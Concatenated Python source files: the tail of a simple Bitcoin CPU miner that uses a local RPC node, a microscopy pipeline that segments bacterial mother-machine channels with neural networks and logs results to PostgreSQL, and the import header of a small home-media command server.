if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4338
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
exptRun.py
|
from scipy.ndimage.measurements import find_objects
import torch.multiprocessing as mp
import psycopg2 as pgdatabase
import torch
import argparse
import os
import sys
import time
import math
import pickle
import h5py
from pathlib import Path
from functools import partial
from torchvision import transforms, utils
from queue import Empty
from pycromanager import Acquisition, Bridge
from narsil.liverun.utils import queueDataset, resizeOneImage, tensorizeOneImage, normalize
from datetime import datetime
from torch.utils.data import DataLoader, Dataset
from narsil.segmentation.network import basicUnet, smallerUnet
from PySide6.QtWidgets import QApplication, QMainWindow, QMessageBox, QFileDialog
from skimage import io
from datetime import datetime
from scipy.signal import find_peaks
from skimage.morphology import remove_small_objects
import numpy as np
from skimage.measure import regionprops, label
from skimage import img_as_ubyte
import concurrent.futures
try:
mp.set_start_method('spawn')
except:
pass
"""
ExptProcess class that creates runs all the processes and
manages shared objects between processes and status of each process
"""
class exptRun(object):
def __init__(self):
# Image acquisition events that you get from GUI
self.acquireEvents = None
# Image process parameters needed to be set
# network model paths are also in imageProcessParameter
self.imageProcessParameters = None
# DB parameters that you get from GUI, used for writing data
# in to the database
self.dbParameters = None
# queues and kill events
self.segmentQueue = mp.Queue()
# write queue will grab the position and write properties and run a thread pool to parallelize
# the calculations as writing is the slowest part of the system
self.writeQueue = mp.Queue()
#self.acquireProcess = None
#self.segmentProcess = None
#self.deadAliveProcess = None
self.acquireKillEvent = mp.Event()
self.segmentKillEvent = mp.Event()
self.writeKillEvent = mp.Event()
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# datasets: These are wrappers around torch multiprocessing queues, that are used
# to fetch data using iterable dataloader. Dataloader
self.segmentDataset = queueDataset(self.segmentQueue)
self.writeDataset = queueDataset(self.writeQueue)
self.cellSegNet = None
self.channelSegNet = None
self.maxTimepoints = 50
self.channelProcessParameters = {
'segThreshold': 0.8,
'minPeaksDistance': 25,
'barcodeWidth': 48,
'minChannelLength':100,
'smallObjectsArea': 64,
'magnification': 40,
'channelsPerBlock': 21,
'channelWidth': 36,
'plateauSize': 15,
}
self.GPUParameters = {
'cellNetBatchSize': 1,
'channelNetBatchSize': 1,
'deadAliveNetBatchSize': 20,
}
self.cellProcessParameters = {
'segThreshold': 0.85,
'smallObjectsArea': 64
}
self.deadAliveParameters = {
}
#def createProcesses(self):
# # all the stuff needed to for processing functions
# # like the networks used etc
# self.acquireProcess = tmp.Process(target=self.acquire, name='acquireProcess')
# self.segmentProcess = tmp.Process(target=self.segment, name='segmentProcess')
# self.deadAliveProcess = tmp.Process(target=self.deadalive, name='deadaliveProcess')
def loadNets(self):
sys.stdout.write(f"Loading networks and sending to device ...\n")
sys.stdout.flush()
# Load the cell-segmentation and channel-segmentation model
cellSegModelPath = Path(self.imageProcessParameters["cellModelPath"])
cellNetState = torch.load(cellSegModelPath, map_location=self.device)
# use the net depending on what model is loaded
if cellNetState['modelParameters']['netType'] == 'big':
self.cellSegNet = basicUnet(cellNetState['modelParameters']['transposeConv'])
elif cellNetState['modelParameters']['netType'] == 'small':
self.cellSegNet = smallerUnet(cellNetState['modelParameters']['transposeConv'])
self.cellSegNet.load_state_dict(cellNetState['model_state_dict'])
self.cellSegNet.to(self.device)
self.cellSegNet.eval()
# channel segmentation model
channelSegModelPath = Path(self.imageProcessParameters["channelModelPath"])
channelNetState = torch.load(channelSegModelPath, map_location=self.device)
# use the net depending on what model is loaded
if channelNetState['modelParameters']['netType'] == 'big':
self.channelSegNet = basicUnet(channelNetState['modelParameters']['transposeConv'])
elif channelNetState['modelParameters']['netType'] == 'small':
self.channelSegNet = smallerUnet(channelNetState['modelParameters']['transposeConv'])
self.channelSegNet.load_state_dict(channelNetState['model_state_dict'])
self.channelSegNet.to(self.device)
self.channelSegNet.eval()
# dead-alive net model
sys.stdout.write(f"Networks loaded onto {self.device} successfully ...\n")
sys.stdout.flush()
# all the transformations can be set depending on the images taken
def setImageTransforms(self):
# operations on the images before processing
self.phaseImageSize = (self.imageProcessParameters["imageHeight"], self.imageProcessParameters["imageWidth"])
self.resize = resizeOneImage(self.phaseImageSize, self.phaseImageSize)
self.normalize = normalize()
self.tensorize = tensorizeOneImage()
self.segTransforms = transforms.Compose([self.resize, self.normalize, self.tensorize])
# set operations on the dead-alive single mother-machine channel images
def putImagesInSegQueue(self, image, metadata):
sys.stdout.write(f"Image Acquired ... {image.shape} .. {metadata['Axes']} .. {metadata['Time']}\n")
sys.stdout.flush()
# transform the image into a tensor
imageTensor = self.segTransforms(image)
# put the image into the segmentDataset
try:
self.segmentQueue.put({'image': imageTensor,
'position': metadata['Axes']['position'],
'time': metadata['Axes']['time']})
except Exception as error:
sys.stderr.write(f"Image at position: {metadata['Axes']['position']} and time: {metadata['Axes']['time']}\n")
sys.stderr.write(f"Error: {error}")
sys.stderr.flush()
# write to database
self.recordInDatabase('arrival', metadata)
def recordInDatabase(self, tableName, data):
con = None
try:
con = pgdatabase.connect(database=self.dbParameters['dbname'],
user=self.dbParameters['dbuser'],
password=self.dbParameters['dbpassword'])
cur = con.cursor()
con.autocommit = True
if tableName == 'arrival':
# insert the arrival of the image into the database table arrival
cur.execute("""INSERT INTO arrival (time, position, timepoint)
VALUES (%s, %s, %s)""", (datetime.now(), int(data['Axes']['position']),
int(data['Axes']['time']),))
elif tableName == 'segment':
cur.execute("""INSERT INTO segment (time, position, timepoint, locations, numchannels)
VALUES (%s, %s, %s, %s, %s)""", (datetime.now(), int(data['position']),
int(data['time']), data['locations'], data['numchannels'],))
elif tableName == 'growth':
for datapoint in data:
cur.execute("""INSERT INTO growth (time, position, timepoint, channelno, areas, lengths, numobjects)
VALUES (%s, %s, %s, %s, %s, %s, %s)""", (datetime.now(), int(datapoint['position']),
int(datapoint['timepoint']), datapoint['channelno'], datapoint['areas'],
datapoint['lengths'], datapoint['numobjects'],))
except pgdatabase.DatabaseError as e:
sys.stderr.write(f"Error in writing to database: {e}\n")
sys.stderr.flush()
finally:
if con:
con.close()
def getLocationsFromDatabase(self, tableName, position, time):
con = None
try:
con = pgdatabase.connect(database=self.dbParameters['dbname'],
user=self.dbParameters['dbuser'],
password=self.dbParameters['dbpassword'])
cur = con.cursor()
con.autocommit = True
if tableName == 'segment':
cur.execute("SELECT locations FROM segment WHERE position=%s AND timepoint=%s", (position, time))
# you get a pickled bytear that needs to be converted to numpy
rows = cur.fetchall()
channelLocations = pickle.loads(rows[0][0])
return channelLocations
except pgdatabase.DatabaseError as e:
sys.stderr.write(f"Error in getting channel locations for m database: {e}\n")
sys.stderr.flush()
finally:
if con:
con.close()
def waitForPFS(self, event, bridge, event_queue):
# wait for focus before acquisition
if not self.acquireKillEvent.is_set():
core = bridge.get_core()
core.full_focus()
#print(event)
return event
# fake acquiring outside to test positions
def acquireFake(self):
#self.loadNets()
#testDataDir = Path("C:\\Users\\Praneeth\\Documents\\Elflab\\Code\\testdata\\hetero40x")
#testDataDir = Path("D:\\Jimmy\\EXP-21-BY1006\\therun")
#testDataDir = Path("D:\\praneeth\\hetero40x")
#testDataDir = Path("/home/pk/Documents/EXP-21-BY1006/therun")
testDataDir = Path("/home/pk/Documents/realtimeData/hetero40x")
for event in self.acquireEvents:
print(f"{event['axes']['position']} -- {event['axes']['time']}")
positionStr = "Pos10" + str(event['axes']['position'])
imgName = imgFilenameFromNumber(int(event['axes']['time']))
channelName = str(event['channel']['config'])
imagePath = testDataDir / positionStr / channelName/ imgName
#print(event)
metadata = {
'Axes': {'position': int(event['axes']['position']),
'time' : int(event['axes']['time'])},
'Time': str(datetime.now())
}
img = io.imread(imagePath)
self.putImagesInSegQueue(img, metadata)
print(imagePath)
print("--------")
time.sleep(0.3)
while not self.acquireKillEvent.is_set():
try:
time.sleep(1)
continue
except KeyboardInterrupt:
self.acquireKillEvent.set()
sys.stdout.write("AcquireFake process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("AcquireFake process completed successfully")
sys.stdout.flush()
def acquire(self):
numPositions = 40
sleepTime = 20 # time to sleep between timepoints
for i, event in enumerate(self.acquireEvents, 1):
with Acquisition(image_process_fn=partial(self.putImagesInSegQueue), post_hardware_hook_fn=self.waitForPFS, debug=False) as acq:
if not self.acquireKillEvent.is_set():
acq.acquire(event)
# hackish
else:
break
if i % numPositions == 0:
time.sleep(sleepTime)
while not self.acquireKillEvent.is_set():
try:
time.sleep(3)
except KeyboardInterrupt:
self.acquireKillEvent.set()
sys.stdout.write("Acquire process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("Acquire process completed successfully\n")
sys.stdout.flush()
# do all the writing to file system using this function,
# abstract out the logic for different cases
def writeFile(self, image, imageType, position, time, channelLocations=None):
# construct directories if they are not there
mainAnalysisDir = Path(self.imageProcessParameters["saveDir"])
if imageType == 'cellSegmentation':
filename = str(time) + '.tiff'
positionDir = str(position)
cellMaskDir = mainAnalysisDir / positionDir / imageType
if not cellMaskDir.exists():
cellMaskDir.mkdir(parents=True, exist_ok=True)
cellMaskFilename = cellMaskDir / filename
image = image * 255
io.imsave(cellMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(str(cellMaskFilename) + " written \n")
sys.stdout.flush()
elif imageType == 'phaseFullImage':
filename = str(time) + '.tiff'
positionDir = str(position)
phaseDir = mainAnalysisDir / positionDir/ imageType
if not phaseDir.exists():
phaseDir.mkdir(parents=True, exist_ok=True)
phaseFilename = phaseDir/ filename
sys.stdout.write(f"{phaseFilename} written\n")
sys.stdout.flush()
io.imsave(phaseFilename, image.astype('float16'), plugin='tifffile')
elif imageType == 'channelSegmentation':
# construct filename
filename = str(time) + '.tiff'
positionDir = str(position)
channelMaskDir = mainAnalysisDir / positionDir / imageType
if not channelMaskDir.exists():
channelMaskDir.mkdir(parents=True, exist_ok=True)
channelMaskFilename = channelMaskDir / filename
image = image * 255
io.imsave(channelMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(str(channelMaskFilename) + " written \n")
sys.stdout.flush()
elif imageType == 'oneMMChannelCellSeg':
if channelLocations == None:
sys.stdout.write(f"Channel locations missing for Pos: {position} and time: {time}\n")
sys.stdout.flush()
else:
filename = str(time) + '.tiff'
positionDir = str(position)
channelWidth = self.channelProcessParameters['channelWidth'] //2
image = image * 255
for (i, location) in enumerate(channelLocations, 0):
channelNo = str(i)
channelDir = mainAnalysisDir / positionDir / imageType / channelNo
if not channelDir.exists():
channelDir.mkdir(parents=True, exist_ok=True)
channelImg = image[:,
location - channelWidth: location + channelWidth]
channelFileName = channelDir / filename
io.imsave(channelFileName, channelImg.astype('uint8'), check_contrast=False, compress=6, plugin='tifffile')
sys.stdout.write(f"{len(channelLocations)} from pos: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'oneMMChannelPhase':
# check if there are locations
if channelLocations == None:
sys.stdout.write(f"Channel Locations missing for Pos:{position} and time:{time}\n")
sys.stdout.flush()
else:
# create directories if not existing and write the stack
filename = str(time) + '.tiff'
positionDir = str(position)
channelWidth = self.channelProcessParameters['channelWidth'] // 2
for (i, location) in enumerate(channelLocations, 0):
channelNo = str(i)
channelDir = mainAnalysisDir / positionDir/ imageType / channelNo
if not channelDir.exists():
channelDir.mkdir(parents=True, exist_ok=True)
channelImg = image[:,
location - channelWidth: location+ channelWidth]
# write the image
channelFileName = channelDir / filename
io.imsave(channelFileName, channelImg, check_contrast=False, compress = 6, plugin='tifffile')
sys.stdout.write(f"{len(channelLocations)} from pos: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'barcodes':
# you get a list of images instead of one image
positionDir = str(position)
barcodesDir = mainAnalysisDir / positionDir/ imageType
if not barcodesDir.exists():
barcodesDir.mkdir(parents=True, exist_ok=True)
for i, oneBarcode in enumerate(image, 0):
filename = str(time) + "_" + str(i) + '.jpg'
oneBarcodeFilename = barcodesDir / filename
io.imsave(oneBarcodeFilename, oneBarcode, check_contrast=False, compress=6,
plugin='tifffile')
sys.stdout.write(f"{len(image)} barcodes written to disk \n")
sys.stdout.flush()
def writeFileH5Py(self, image, imageType, position, time, channelLocations=None):
mainAnalysisDir = Path(self.imageProcessParameters["saveDir"])
if imageType == 'cellSegmentation':
filename = str(time) + '.tiff'
positionDir = str(position)
cellMaskDir = mainAnalysisDir / positionDir / imageType
if not cellMaskDir.exists():
cellMaskDir.mkdir(parents=True, exist_ok=True)
cellMaskFilename = cellMaskDir / filename
image = image * 255
io.imsave(cellMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(f"{cellMaskFilename} written\n")
sys.stdout.flush()
elif imageType == 'phaseFullImage':
filename = str(time) + '.tiff'
positionDir = str(position)
phaseDir = mainAnalysisDir / positionDir/ imageType
if not phaseDir.exists():
phaseDir.mkdir(parents=True, exist_ok=True)
phaseFilename = phaseDir/ filename
sys.stdout.write(f"{phaseFilename} written\n")
sys.stdout.flush()
io.imsave(phaseFilename, image.astype('float16'), plugin='tifffile')
elif imageType == 'channelSegmentation':
filename = str(time) + '.tiff'
positionDir = str(position)
channelMaskDir = mainAnalysisDir / positionDir / imageType
if not channelMaskDir.exists():
channelMaskDir.mkdir(parents=True, exist_ok=True)
channelMaskFilename = channelMaskDir / filename
image = image * 255
io.imsave(channelMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(f"{channelMaskFilename} written\n")
sys.stdout.flush()
elif imageType == 'oneMMChannelCellSeg':
if channelLocations == None:
sys.stdout.write(f"Channel locations missing for Pos: {position} and time: {time}\n")
sys.stdout.flush()
else:
positionDir = str(position)
writeDir = mainAnalysisDir / positionDir/ imageType
if not writeDir.exists():
writeDir.mkdir(parents=True, exist_ok=True)
height, width = image.shape
channelWidth = self.channelProcessParameters['channelWidth'] // 2
if time == 0:
# create on hdf5 stack for each of the channel locations
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
with h5py.File(writeDir / filename, 'a') as f:
f.create_dataset("stack",
(self.maxTimepoints, height, self.channelProcessParameters['channelWidth']),
dtype='float16', compression='gzip')
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
else:
# open and write
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
with h5py.File(writeDir/filename, 'a') as f:
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
sys.stdout.write(f"{len(channelLocations)} from position: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'oneMMChannelPhase':
if channelLocations == None:
sys.stdout.write(f"Channel locations missing for Pos: {position} and time: {time}\n")
sys.stdout.flush()
else:
positionDir = str(position)
writeDir = mainAnalysisDir / positionDir/ imageType
if not writeDir.exists():
writeDir.mkdir(parents=True, exist_ok=True)
height, width = image.shape
channelWidth = self.channelProcessParameters['channelWidth'] // 2
if time == 0:
# create on hdf5 stack for each of the channel locations
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
sys.stdout.write(f"{writeDir/filename} --- {location} -- {channelWidth}\n")
sys.stdout.flush()
with h5py.File(writeDir / filename, 'a') as f:
f.create_dataset("stack",
(self.maxTimepoints, height, self.channelProcessParameters['channelWidth']),
dtype='float16', compression='gzip')
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
else:
# open and write
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
with h5py.File(writeDir/filename, 'a') as f:
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
sys.stdout.write(f"{len(channelLocations)} from position: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'barcodes':
positionDir = str(position)
barcodesDir = mainAnalysisDir / positionDir/ imageType
if not barcodesDir.exists():
barcodesDir.mkdir(parents=True, exist_ok=True)
for i, oneBarcode in enumerate(image, 0):
filename = str(time) + "_" + str(i) + '.tiff'
oneBarcodeFilename = barcodesDir / filename
io.imsave(oneBarcodeFilename, oneBarcode, check_contrast=False, compress=6, plugin='tifffile')
sys.stdout.write(f"{len(image)} barcodes written to disk\n")
sys.stdout.flush()
# return the number of channels detected, locations to write to database
# assume it is one image per batch
# TODO: batching of images done later
def processChannels(self, image, position, time):
# pass throught the cell net to get
sys.stdout.write(f"Image is on GPU: {image.is_cuda} -- \n")
sys.stdout.flush()
cellSegMask = torch.sigmoid(self.cellSegNet(image)) > self.cellProcessParameters['segThreshold']
# send to cpu to be saved cut according to position
cellSegMaskCpu = cellSegMask.cpu().detach().numpy().squeeze(0).squeeze(0)
# remove smaller objects
#cellSegMaskCpu = remove_small_objects(cellSegMaskCpu.astype('bool'), min_size=self.cellProcessParameters['smallObjectsArea'])
self.writeFileH5Py(cellSegMaskCpu, 'cellSegmentation', position, time)
# get the phase image and use it to crop channels for viewing
phase_img = image.cpu().detach().numpy().squeeze(0).squeeze(0)
self.writeFileH5Py(phase_img, 'phaseFullImage', position, time)
# pass through net and get the results
# change of approach, we only find channels in the first image and use them for the rest of the
# images as it is possible to accumulate errors in wierd ways if you use channel locations from
# each image, especially in 40x on data of not the highest quality
if time == 0:
channelSegMask = torch.sigmoid(self.channelSegNet(image)) > self.channelProcessParameters['segThreshold']
# sent to cpu and saved according to position and timepoint
channelSegMaskCpu = channelSegMask.cpu().detach().numpy().squeeze(0).squeeze(0)
# need to remove smaller objects of the artifacts
#channelSegMaskCpu = remove_small_objects(channelSegMaskCpu.astype('bool'), min_size = self.channelProcessParameters['smallObjectsArea'])
self.writeFileH5Py(channelSegMaskCpu, 'channelSegmentation', position, time)
hist = np.sum(channelSegMaskCpu, axis = 0) > self.channelProcessParameters['minChannelLength']
peaks, _ = find_peaks(hist, distance=self.channelProcessParameters['minPeaksDistance'],
plateau_size=self.channelProcessParameters['plateauSize'])
locationsBarcodes, locationsChannels = findBarcodesAndChannels(peaks,
self.channelProcessParameters)
# grab barcode and then grab the channels in each image and write
barcodeImages = []
barcodeWidth = self.channelProcessParameters['barcodeWidth']
for location in locationsBarcodes:
barcode_img = phase_img[:, location - barcodeWidth//2: location + barcodeWidth//2]
barcodeImages.append(barcode_img)
# stack the barcode and write all at the same time
self.writeFileH5Py(barcodeImages, 'barcodes', position, time)
sys.stdout.write(f"No of barcode regions detected: {len(barcodeImages)}\n")
sys.stdout.flush()
if len(locationsChannels) == 0:
sys.stdout.write(f"Skipping position: {position} data\n")
sys.stdout.flush()
# record failed status to the database
else:
# write the channels appropraitely
sys.stdout.write(f"No of channels identified: {len(locationsChannels)}\n")
sys.stdout.flush()
# write the phase and segmented mask chopped files
#self.writeFileH5Py(phase_img, 'oneMMChannelPhase', position, time, channelLocations=locationsChannels)
#self.writeFileH5Py(cellSegMaskCpu, 'oneMMChannelCellSeg', position, time, channelLocations=locationsChannels)
# write positions to database
dataToDatabase = {
'time': time,
'position': position,
'locations': pickle.dumps(locationsChannels),
'numchannels': len(locationsChannels)
}
self.recordInDatabase('segment', dataToDatabase)
else:
# what to do for the rest of the timepoint, use the positions from above
# get channel locations from the database
locationsChannels = self.getLocationsFromDatabase('segment', position, 0)
# write phase images
#self.writeFileH5Py(phase_img, 'oneMMChannelPhase', position, time, channelLocations=locationsChannels)
# write cell segmentation images
#self.writeFileH5Py(cellSegMaskCpu, 'oneMMChannelCellSeg', position, time, channelLocations=locationsChannels)
dataToDatabase = {
'time': time,
'position': position,
'locations': pickle.dumps(locationsChannels),
'numchannels': len(locationsChannels)
}
self.recordInDatabase('segment', dataToDatabase)
sys.stdout.write("\n ---------\n")
sys.stdout.flush()
return locationsChannels
def processCells(self, image, position, time, channelLocations):
# pass throught the cell net to get
cellSegMask = torch.sigmoid(self.cellSegNet(image)) > self.cellProcessParameters['segThreshold']
# send to cpu to be saved cut according to position
cellSegMaskCpu = cellSegMask.cpu().detach().numpy().squeeze(0).squeeze(0)
# remove smaller objects
cellSegMaskCpu = remove_small_objects(cellSegMaskCpu.astype('bool'), min_size=self.cellProcessParameters['smallObjectsArea'])
self.writeFile(cellSegMaskCpu, 'cellSegmentation', position, time)
def segment(self):
# segmentation loop for both cell and channels
sys.stdout.write(f"Starting segmentation ... \n")
sys.stdout.flush()
self.loadNets()
while not self.segmentKillEvent.is_set():
try:
dataloader = DataLoader(self.segmentDataset, batch_size=1)
with torch.no_grad():
for data in dataloader:
#image = data['image'].to(self.device)
image = data['image'].to(self.device)
if data == None:
#time.sleep()
continue
channelLocations = self.processChannels(image, int(data['position']), int(data['time']))
# put the datapoint in the queue for calculating the growth stuff like areas, lengths, etc
del image
self.writeQueue.put({
'position': int(data['position']),
'time': int(data['time']),
'numchannels': len(channelLocations)
})
#sys.stdout.write(f"Image shape segmented: {image.shape}--{data['position']} -- {data['time']} \n")
#sys.stdout.flush()
except Empty:
sys.stdout.write("Segmentation queue is empty .. but process shutdown is not happening\n")
sys.stdout.flush()
except KeyboardInterrupt:
self.segmentKillEvent.set()
sys.stdout.write(f"Segmetation process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("Segmentation process completed successfully\n")
sys.stdout.flush()
def calculateOnePosition(self, datapoint):
# calculate the properties of one position and write them to the database
try:
mainAnalysisDir = Path(self.imageProcessParameters["saveDir"])
position = int(datapoint[0])
time = int(datapoint[1])
channelLocations = self.getLocationsFromDatabase('segment', int(datapoint[0]), 0)
# get channel locations from database
filename = str(time) + '.tiff'
positionDir = str(position)
#phaseImageFilename = mainAnalysisDir / positionDir / "phaseFullImage" / filename
segImageFilename = mainAnalysisDir / positionDir / "cellSegmentation" / filename
# read the phase image cut and write
#phase_img = io.imread(phaseImageFilename)
seg_img = io.imread(segImageFilename)
seg_img = seg_img.astype('uint8')
# data for one image is bundled and added to the database at once
dataToDatabase = []
channelWidth = self.channelProcessParameters['channelWidth'] // 2
for (i, location) in enumerate(channelLocations, 0):
channelNo = str(i)
#phaseChannelsDir = mainAnalysisDir / positionDir/ "oneMMChannelPhase" / channelNo
#segChannelsDir = mainAnalysisDir / positionDir / "oneMMChannelCellSeg" / channelNo
#if not phaseChannelsDir.exists():
# phaseChannelsDir.mkdir(parents=True, exist_ok=True)
#if not segChannelsDir.exists():
# segChannelsDir.mkdir(parents=True, exist_ok=True)
#phaseChannelImg = phase_img[:,
# location - channelWidth: location + channelWidth]
segChannelImg = seg_img[:,
location - channelWidth: location + channelWidth]
# write the image
#phaseChannelFileName = phaseChannelsDir / filename
#segChannelFileName = segChannelsDir / filename
props = regionprops(label(segChannelImg))
areas = []
lengths = []
numobjects = []
for blob_index in range(len(props)):
#if props[i]['area'] > 64 and props[i]['major_axis_length'] < 200:
areas.append(props[blob_index]['area'])
lengths.append(props[blob_index]['major_axis_length'])
numobjects.append(blob_index)
channelPropertiesToDatabase = {
'position': position,
'timepoint': time,
'channelno': i,
'areas': pickle.dumps(areas),
'lengths': pickle.dumps(lengths),
'numobjects': pickle.dumps(numobjects)
}
#io.imsave(phaseChannelFileName, phaseChannelImg.astype('float16'), check_contrast=False, compress = 6, plugin='tifffile')
#io.imsave(segChannelFileName, segChannelImg.astype('uint8'), check_contrast=False, compress=6, plugin='tifffile')
dataToDatabase.append(channelPropertiesToDatabase)
self.recordInDatabase('growth', dataToDatabase)
sys.stdout.write(f"Calculating for position: {datapoint[0]} -- time: {datapoint[1]} -- no of channels: {len(channelLocations)}\n")
sys.stdout.flush()
except Exception as e:
sys.stdout.write(f"Error : {e} in writing files\n")
sys.stdout.flush()
#self.recordInDatabase('growth', properties)
def properties(self):
# dead-alive net loop for doing dead-alive analysis in single channel phase stacks
sys.stdout.write(f"Starting properties analyzer ... \n")
sys.stdout.flush()
# wait for kill event
while not self.writeKillEvent.is_set():
try:
# write the dataloader to get the right stuff into the net
dataloader = DataLoader(self.writeDataset, batch_size=6, num_workers=2)
with torch.no_grad():
for data in dataloader:
#calculateOnePosition(data['position'], data['time'], data['numChannels'])
if data is None:
#time.sleep(5)
continue
else:
# arguments construction for pool execution
positions = list(data['position'].numpy())
times = list(data['time'].numpy())
numOfChannels = list(data['numchannels'].numpy())
arguments = list(zip(positions, times, numOfChannels))
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.calculateOnePosition, arguments)
# start a thread pool to speed up the execution of reading writing properties
sys.stdout.write(f" Write Process: {data}\n")
sys.stdout.flush()
except KeyboardInterrupt:
self.writeKillEvent.set()
sys.stdout.write("Writing process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("Writing properties process completed successfully\n")
sys.stdout.flush()
# this function will be called for calculating the growth for a position
def growth(self):
pass
# basically start all the experiment processes and run
# until the abort buttons are pressed
def run(self):
self.loadNets()
self.createProcesses()
self.acquireProcess.start()
self.acquireProcess = None # set this to none so that the process context
# doesn't get copied as it is not picklable
self.segmentProcess.start()
def stop(self):
self.acquireKillEvent.set()
self.segmentKillEvent.set()
self.writeKillEvent.set()
# if it fails write the state and bail, and use this state to restart after adjusting
def savedState(self):
pass
def runProcesses(exptRunObject):
#exptRunObject.loadNets()
try:
mp.set_start_method('spawn')
except:
pass
exptRunObject.acquireKillEvent.clear()
acquireProcess = mp.Process(target=exptRunObject.acquire, name='Acquire Process')
acquireProcess.start()
exptRunObject.segmentKillEvent.clear()
segmentProcess = mp.Process(target=exptRunObject.segment, name='Segment Process')
segmentProcess.start()
exptRunObject.writeKillEvent.clear()
writeProcess = mp.Process(target=exptRunObject.properties, name='Propertis write Process')
writeProcess.start()
# In the datasets image names are img_000000000.tiff format.
def imgFilenameFromNumber(number):
if number == 0:
num_digits = 1
else:
num_digits = int(math.log10(number)) + 1
imgFilename = 'img_' + '0' * (9 - num_digits) + str(number) + '.tiff'
return imgFilename
def findBarcodesAndChannels(peaks, parameters = { 'minChannelLength': 200, 'minPeaksDistance' : 25,
'barcodeWidth' : 48, 'channelsPerBlock': 21, 'plateauSize':15, 'channelWidth': 36}):
#hist = np.sum(image, axis = 0) > parameters['minChannelLength']
#peaks, _ = find_peaks(hist, distance=parameters['minPeaksDistance'], plateau_size=parameters['plateauSize'])
indices_with_larger_gaps = np.where(np.ediff1d(peaks) > parameters['barcodeWidth'])[0]
locations_before_barcode = peaks[indices_with_larger_gaps]
locations_after_barcode = peaks[indices_with_larger_gaps + 1]
locations_barcode = np.rint(np.mean((locations_before_barcode,
locations_after_barcode), axis = 0)).astype('int')
num_barcodes = len(locations_barcode)
# there are 5 barcodes seen in the image
if num_barcodes == 5:
# count the number of channels before the first barcode and after the
# last barcode and include them upto numChannels channels
y_channels = []
# channels before first barcode
indices_before_first = np.where(peaks < locations_barcode[0])[0]
if peaks[indices_before_first[0]] < parameters['channelWidth']//2:
indices_before_first = indices_before_first[1:]
y_channels.extend(list(peaks[indices_before_first]))
for i in range(num_barcodes):
indices = np.where(np.logical_and(peaks > locations_barcode[i-1],
peaks < locations_barcode[i]))[0]
y_channels.extend(list(peaks[indices]))
# number of channels to count after the last
number_to_include = parameters['channelsPerBlock'] - len(indices_before_first)
indices_after_last = np.where(peaks > locations_barcode[-1])[0]
y_channels.extend(list(peaks[indices_after_last][:number_to_include]))
elif num_barcodes == 6:
y_channels = []
# count only the channels between barcodes and
# grab the (x, y) locations to cut,
# x will be the top of the channel, row number
# y will be the peak picked up in the histogram, between the barcodes
# count 21 channels after calculating
for i in range(num_barcodes):
indices = np.where(np.logical_and(peaks > locations_barcode[i-1],
peaks < locations_barcode[i]))[0]
#if len(indices) == 21:
# all good pick them up
y_channels.extend(list(peaks[indices]))
else:
# detection failure, since it is ambiguous skipp the position
y_channels = []
sys.stdout.write(f"Detection failure, {num_barcodes} detected\n")
sys.stdout.flush()
# locations of the barcode and locations of channels to cut.
return locations_barcode, y_channels
class tweezerWindow(QMainWindow):
def __init__(self):
pass
if __name__ == "__main__":
print("Experiment Processes launch ...")
# parse the argments and create appropriate processes and queues
|
simple_cmd_server.py
|
#!/usr/bin/env python
"""
Intended target: OSMC device
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import os
from Speaker.SwitchSpeaker import SwitchSpeaker
from Logging.LogClient import LogClient
from harmony.Harmony import HarmonyClient
from harmony.HarmonyChecker import HarmonyChecker
